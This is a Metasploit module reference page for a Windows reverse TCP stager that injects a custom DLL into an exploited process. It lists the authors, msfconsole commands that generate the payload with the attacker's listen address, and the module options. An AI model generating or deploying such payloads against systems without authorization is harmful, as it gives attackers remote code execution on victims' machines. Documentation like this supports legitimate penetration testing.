Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) | Metasploit Exploit Database (DB)

Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)

Connect back to the attacker, Inject a custom DLL into the exploited process

Search Other Modules


Rank

  • Normal

Authors

  • jt < jt [at] klake.org >
  • skape < mmiller [at] hick.org >
  • spoonm < spoonm [at] no$email.com >

Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use payload/windows/patchupdllinject/reverse_ord_tcp
msf payload(reverse_ord_tcp) > set DLL [PATH]
msf payload(reverse_ord_tcp) > set LHOST [MY IP ADDRESS]
msf payload(reverse_ord_tcp) > generate


Module Options

DLL The local path to the DLL to upload
EXITFUNC Exit technique: thread, seh, none, process (default: process)
LHOST The listen address
LPORT The listen port (default: 4444)
LibraryName The symbolic name of the library to upload
ReverseConnectRetries The number of connection attempts to try before exiting the process
ReverseListenerBindAddress The specific IP address to bind to on the local system
ReverseListenerComm The specific communication channel to use for this listener
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module